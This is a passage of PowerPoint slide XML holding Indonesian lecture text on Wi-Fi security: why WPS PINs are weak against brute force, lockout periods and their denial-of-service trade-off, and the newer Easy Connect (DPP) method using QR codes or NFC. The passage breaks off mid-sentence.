              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibobol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> jam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membobolnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar-benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilanjutkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguncian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguncian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditingkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penolakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (DoS). Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAP, sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Metode Easy Connect, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diumumkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimaksudkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi. Easy Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Device Provisioning Protocol (DPP).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpartisipasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Easy Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (QR) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NFC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Easy Connect dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
